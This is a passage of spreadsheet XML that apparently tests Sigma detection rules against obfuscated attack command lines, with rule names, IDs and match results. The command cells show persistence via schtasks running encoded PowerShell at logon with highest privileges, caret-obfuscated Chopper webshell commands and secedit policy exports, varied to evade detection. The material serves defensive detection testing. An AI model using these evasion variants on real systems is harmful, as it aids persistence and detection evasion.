          <t>schtasks.exe /Create /TN "BypassTask" /TR "powershell.exe -EncodedCommand aQBlAHgAZQB..." /SC ONLOGON /RL HIGHEST /F</t>
        </is>
      </c>
      <c r="F372" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G372" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H372" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I372" s="36" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges (7a02e22e-b885-4404-b38b-1ddc7e65258a); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J372" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K372" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="373" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A373" s="43" t="n"/>
      <c r="B373" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader_encoded</t>
        </is>
      </c>
      <c r="C373" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Encoded Payload from Registry</t>
        </is>
      </c>
      <c r="D373" s="36" t="inlineStr">
        <is>
          <t>c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78</t>
        </is>
      </c>
      <c r="E373" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /tN "BypassTask" /"TR" "powershell.exe -"EncodedCommand" aQBlAHgAZQB..." /sc ONLOGON /"RL" HIGHEST /F</t>
        </is>
      </c>
      <c r="F373" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G373" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H373" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I373" s="36" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges (7a02e22e-b885-4404-b38b-1ddc7e65258a); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J373" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K373" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="374" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A374" s="43" t="n"/>
      <c r="B374" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader_encoded</t>
        </is>
      </c>
      <c r="C374" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Encoded Payload from Registry</t>
        </is>
      </c>
      <c r="D374" s="36" t="inlineStr">
        <is>
          <t>c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78</t>
        </is>
      </c>
      <c r="E374" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /"Create" /"TN" "BypassTask" /tR "powershell.exe -enc aQBlAHgAZQB..." /SC ONLOGON /Rl HIGHEST /f</t>
        </is>
      </c>
      <c r="F374" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G374" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H374" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I374" s="36" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges (7a02e22e-b885-4404-b38b-1ddc7e65258a)</t>
        </is>
      </c>
      <c r="J374" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K374" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="375" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A375" s="43" t="n"/>
      <c r="B375" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader_encoded</t>
        </is>
      </c>
      <c r="C375" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Encoded Payload from Registry</t>
        </is>
      </c>
      <c r="D375" s="36" t="inlineStr">
        <is>
          <t>c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78</t>
        </is>
      </c>
      <c r="E375" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /"TN" "BypassTask" /tR "powershell.exe -"EncodedCommand" aQBlAHgAZQB..." /"SC" ONLOGON /Rl HIGHEST /F</t>
        </is>
      </c>
      <c r="F375" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G375" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H375" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I375" s="36" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges (7a02e22e-b885-4404-b38b-1ddc7e65258a); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J375" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K375" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="376" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A376" s="43" t="n"/>
      <c r="B376" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader_encoded</t>
        </is>
      </c>
      <c r="C376" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Encoded Payload from Registry</t>
        </is>
      </c>
      <c r="D376" s="36" t="inlineStr">
        <is>
          <t>c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78</t>
        </is>
      </c>
      <c r="E376" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /"TN" "BypassTask" /TR "powershell.exe -enc aQBlAHgAZQB..." /SC ONLOGON /Rl HIGHEST /"F"</t>
        </is>
      </c>
      <c r="F376" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G376" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H376" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I376" s="36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376" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K376" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="377" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A377" s="43" t="n"/>
      <c r="B377" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader_encoded</t>
        </is>
      </c>
      <c r="C377" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Encoded Payload from Registry</t>
        </is>
      </c>
      <c r="D377" s="36" t="inlineStr">
        <is>
          <t>c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78</t>
        </is>
      </c>
      <c r="E377" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /tN "BypassTask" /tr "powershell.exe -eNcOdEDcoMmand aQBlAHgAZQB..." /SC ONLOGON /rl HIGHEST /F</t>
        </is>
      </c>
      <c r="F377" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G377" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H377" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I377" s="36" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges (7a02e22e-b885-4404-b38b-1ddc7e65258a); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J377" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K377" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="378" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A378" s="43" t="n"/>
      <c r="B378" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader_encoded</t>
        </is>
      </c>
      <c r="C378" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Encoded Payload from Registry</t>
        </is>
      </c>
      <c r="D378" s="36" t="inlineStr">
        <is>
          <t>c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78</t>
        </is>
      </c>
      <c r="E378" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe -"Create" /tN "BypassTask" /"TR" "powershell.exe -enc aQBlAHgAZQB..." -"SC" ONLOGON /RL HIGHEST /F</t>
        </is>
      </c>
      <c r="F378" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G378" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H378" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I378" s="36" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges (7a02e22e-b885-4404-b38b-1ddc7e65258a)</t>
        </is>
      </c>
      <c r="J378" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K378" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="379" ht="15.75" customHeight="1" s="42">
      <c r="A379" s="43" t="n"/>
      <c r="B379" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader_encoded</t>
        </is>
      </c>
      <c r="C379" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Encoded Payload from Registry</t>
        </is>
      </c>
      <c r="D379" s="36" t="inlineStr">
        <is>
          <t>c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78</t>
        </is>
      </c>
      <c r="E379" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /CreATe /TN "BypassTask" /tr "powershell.exe -enc aQBlAHgAZQB..." /SC ONLOGON /RL HIGHEST /f</t>
        </is>
      </c>
      <c r="F379" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G379" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H379" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I379" s="36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379" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K379" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="380" ht="15.75" customHeight="1" s="42">
      <c r="A380" s="43" t="n"/>
      <c r="B380" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader_encoded</t>
        </is>
      </c>
      <c r="C380" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Encoded Payload from Registry</t>
        </is>
      </c>
      <c r="D380" s="43" t="inlineStr">
        <is>
          <t>c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78</t>
        </is>
      </c>
      <c r="E380" s="43" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /tn "BypassTask" /tR "powershell.exe -enc aQBlAHgAZQB..." /SC ONLOGON /RL HIGHEST /f</t>
        </is>
      </c>
      <c r="F380" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G380" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H380" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I380" s="43" t="inlineStr">
        <is>
          <t>Suspicious Command Patterns In Scheduled Task Creation (f2c64357-b1d2-41b7-849f-34d2682c0fad); Suspicious Schtasks Schedule Type With High Privileges (7a02e22e-b885-4404-b38b-1ddc7e65258a); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J380" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K380" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="381" ht="15.75" customHeight="1" s="42">
      <c r="A381" s="36" t="n"/>
      <c r="B381" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader_encoded</t>
        </is>
      </c>
      <c r="C381" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Encoded Payload from Registry</t>
        </is>
      </c>
      <c r="D381" s="36" t="inlineStr">
        <is>
          <t>c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78</t>
        </is>
      </c>
      <c r="E381" s="43" t="inlineStr">
        <is>
          <t>schtasks.exe /"Create" -"TN" "BypassTask" -"TR" "powershell.exe -ENcOdEdCOmmANd aQBlAHgAZQB..." /sc ONLOGON /RL HIGHEST /F</t>
        </is>
      </c>
      <c r="F381" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G381" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H381" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I381" s="43" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges (7a02e22e-b885-4404-b38b-1ddc7e65258a)</t>
        </is>
      </c>
      <c r="J381" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K381" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="382" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A382" s="43" t="n"/>
      <c r="B382" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader_encoded</t>
        </is>
      </c>
      <c r="C382" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Encoded Payload from Registry</t>
        </is>
      </c>
      <c r="D382" s="43" t="inlineStr">
        <is>
          <t>c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78</t>
        </is>
      </c>
      <c r="E382" s="43" t="inlineStr">
        <is>
          <t>schtasks.exe -"Create" /tn "BypassTask" -"TR" "powershell.exe -ENCodeDcOMMAND aQBlAHgAZQB..." /SC ONLOGON /Rl HIGHEST /f</t>
        </is>
      </c>
      <c r="F382" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G382" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H382" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I382" s="43" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges (7a02e22e-b885-4404-b38b-1ddc7e65258a)</t>
        </is>
      </c>
      <c r="J382" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K382" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="383" ht="15.75" customHeight="1" s="42">
      <c r="A383" s="36" t="n"/>
      <c r="B383" s="36" t="n"/>
      <c r="C383" s="36" t="n"/>
      <c r="D383" s="36" t="n"/>
      <c r="E383" s="43" t="n"/>
      <c r="F383" s="43" t="n"/>
      <c r="G383" s="43" t="n"/>
      <c r="H383" s="43" t="n"/>
      <c r="I383" s="43" t="n"/>
      <c r="J383" s="43" t="n"/>
    </row>
    <row r="384" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A384" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B384" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution</t>
        </is>
      </c>
      <c r="C384" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution</t>
        </is>
      </c>
      <c r="D384" s="43" t="inlineStr">
        <is>
          <t>42a993dd-bb3e-48c8-b372-4d6684c4106c</t>
        </is>
      </c>
      <c r="E384" s="43" t="n"/>
      <c r="F384" s="43" t="n"/>
      <c r="G384" s="43" t="n"/>
      <c r="H384" s="43" t="n"/>
      <c r="I384" s="43" t="n"/>
      <c r="J384" s="43" t="n"/>
      <c r="K384" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="385" ht="15.75" customHeight="1" s="42">
      <c r="A385" s="36" t="n"/>
      <c r="B385" s="36" t="n"/>
      <c r="C385" s="36" t="n"/>
      <c r="D385" s="36" t="n"/>
      <c r="E385" s="43" t="n"/>
      <c r="F385" s="43" t="n"/>
      <c r="G385" s="43" t="n"/>
      <c r="H385" s="43" t="n"/>
      <c r="I385" s="43" t="n"/>
      <c r="J385" s="43" t="n"/>
    </row>
    <row r="386" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A386" s="43" t="inlineStr">
        <is>
          <t>t1078</t>
        </is>
      </c>
      <c r="B386" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_password_plaintext</t>
        </is>
      </c>
      <c r="C386" s="43" t="inlineStr">
        <is>
          <t>Password Provided In Command Line Of Net.EXE</t>
        </is>
      </c>
      <c r="D386" s="43" t="inlineStr">
        <is>
          <t>d4498716-1d52-438f-8084-4a603157d131</t>
        </is>
      </c>
      <c r="E386" s="43" t="n"/>
      <c r="F386" s="43" t="n"/>
      <c r="G386" s="43" t="n"/>
      <c r="H386" s="43" t="n"/>
      <c r="I386" s="43" t="n"/>
      <c r="J386" s="43" t="n"/>
      <c r="K386" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="387" ht="15.75" customHeight="1" s="42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43" t="n"/>
      <c r="J387" s="36" t="n"/>
    </row>
    <row r="388" ht="15.75" customHeight="1" s="42">
      <c r="A388" s="36" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B388" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_secedit_execution</t>
        </is>
      </c>
      <c r="C388" s="36" t="inlineStr">
        <is>
          <t>Potential Suspicious Activity Using SeCEdit</t>
        </is>
      </c>
      <c r="D388" s="36" t="inlineStr">
        <is>
          <t>c2c76b77-32be-4d1f-82c9-7e544bdfe0eb</t>
        </is>
      </c>
      <c r="E388" s="36" t="n"/>
      <c r="F388" s="36" t="n"/>
      <c r="G388" s="36" t="n"/>
      <c r="H388" s="36" t="n"/>
      <c r="I388" s="43" t="n"/>
      <c r="J388" s="36" t="n"/>
      <c r="K388" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="389" ht="15.75" customHeight="1" s="42">
      <c r="A389" s="36" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B389" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_secedit_execution</t>
        </is>
      </c>
      <c r="C389" s="36" t="inlineStr">
        <is>
          <t>Potential Suspicious Activity Using SeCEdit</t>
        </is>
      </c>
      <c r="D389" s="36" t="inlineStr">
        <is>
          <t>c2c76b77-32be-4d1f-82c9-7e544bdfe0eb</t>
        </is>
      </c>
      <c r="E389" s="36" t="inlineStr">
        <is>
          <t>secedit.exe -export /areas SECURITYPOLICY -cfg output_mysecpol.txt</t>
        </is>
      </c>
      <c r="F389" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G389" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H389" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I389" s="43" t="n"/>
      <c r="J389" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K389" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="390" ht="15.75" customHeight="1" s="42">
      <c r="A390" s="36" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B390" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_secedit_execution</t>
        </is>
      </c>
      <c r="C390" s="36" t="inlineStr">
        <is>
          <t>Potential Suspicious Activity Using SeCEdit</t>
        </is>
      </c>
      <c r="D390" s="36" t="inlineStr">
        <is>
          <t>c2c76b77-32be-4d1f-82c9-7e544bdfe0eb</t>
        </is>
      </c>
      <c r="E390" s="36" t="inlineStr">
        <is>
          <t>secedit.exe "/configure" /db mytemplate.db</t>
        </is>
      </c>
      <c r="F390" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G390" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H390" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I390" s="43" t="inlineStr">
        <is>
          <t>Potential Suspicious Activity Using SeCEdit (c2c76b77-32be-4d1f-82c9-7e544bdfe0eb)</t>
        </is>
      </c>
      <c r="J390" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K390" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="391" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A391" s="36" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B391" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_secedit_execution</t>
        </is>
      </c>
      <c r="C391" s="36" t="inlineStr">
        <is>
          <t>Potential Suspicious Activity Using SeCEdit</t>
        </is>
      </c>
      <c r="D391" s="36" t="inlineStr">
        <is>
          <t>c2c76b77-32be-4d1f-82c9-7e544bdfe0eb</t>
        </is>
      </c>
      <c r="E391" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c secedit.exe /exp^ort /areas SECURITYPOLICY /cfg output_mysecpol.txt</t>
        </is>
      </c>
      <c r="F391" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G391" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H391" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I391" s="36" t="inlineStr">
        <is>
          <t>Potential Suspicious Activity Using SeCEdit (c2c76b77-32be-4d1f-82c9-7e544bdfe0eb)</t>
        </is>
      </c>
      <c r="J391" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K391" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="392" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A392" s="43" t="n"/>
      <c r="B392" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C392" s="36" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D392" s="36" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E392" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /TN EvilTask /TR "C:\Windows\System32\calc.exe" /SC WEEKLY /D MON /"ST" 08:00</t>
        </is>
      </c>
      <c r="F392" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G392" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H392" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I392" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J392" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K392" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="393" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A393" s="43" t="n"/>
      <c r="B393" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C393" s="36" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D393" s="36" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E393" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /"Create" /"TN" EvilTask /TR "C:\Windows\System32\calc.exe" /SC WEEKLY /d MON /"ST" 08:00</t>
        </is>
      </c>
      <c r="F393" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G393" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H393" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I393" s="43" t="n"/>
      <c r="J393" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K393" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="394" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A394" s="36" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B394" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C394" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D394" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E394" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "&amp;dir&amp;&amp;echo [E]"</t>
        </is>
      </c>
      <c r="F394" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G394" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H394" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I394" s="36" t="n"/>
      <c r="J394" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K394" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="395" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A395" s="36" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B395" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C395" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D395" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E395" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "&amp;wh^oami&amp;echo"</t>
        </is>
      </c>
      <c r="F395" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G395" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H395" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I395" s="43" t="n"/>
      <c r="J395" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K395" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="396" ht="15.75" customHeight="1" s="42">
      <c r="A396" s="43" t="n"/>
      <c r="B396" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C396" s="36" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D396" s="36" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E396" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /CREaTe /TN EvilTask -"TR" "C:\Windows\System32\calc.exe" /"SC" WEEKLY -"D" MON /ST 08:00</t>
        </is>
      </c>
      <c r="F396" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G396" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H396" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I396" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J396" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K396" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="397" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A397" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B397" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C397" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D397" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E397" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" w^hoami&amp;echo [S]</t>
        </is>
      </c>
      <c r="F397" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G397" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H397" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I397" s="36" t="n"/>
      <c r="J397" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K397" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="398" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A398" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B398" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C398" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D398" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E398" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" w^hoami&amp;echo [S]</t>
        </is>
      </c>
      <c r="F398" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G398" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H398" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I398" s="36" t="n"/>
      <c r="J398" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K398" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="399" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A399" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B399" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C399" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D399" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E399" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /C w^hoami&amp;echo [S]</t>
        </is>
      </c>
      <c r="F399" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G399" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H399" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I399" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073); Whoami Utility Execution (e28a5a99-da44-436d-b7a0-2afc20a5f413)</t>
        </is>
      </c>
      <c r="J399" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K399" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="400" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A400" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B400" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C400" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D400" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E400" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "&amp;wh^oami&amp;ec^ho"</t>
        </is>
      </c>
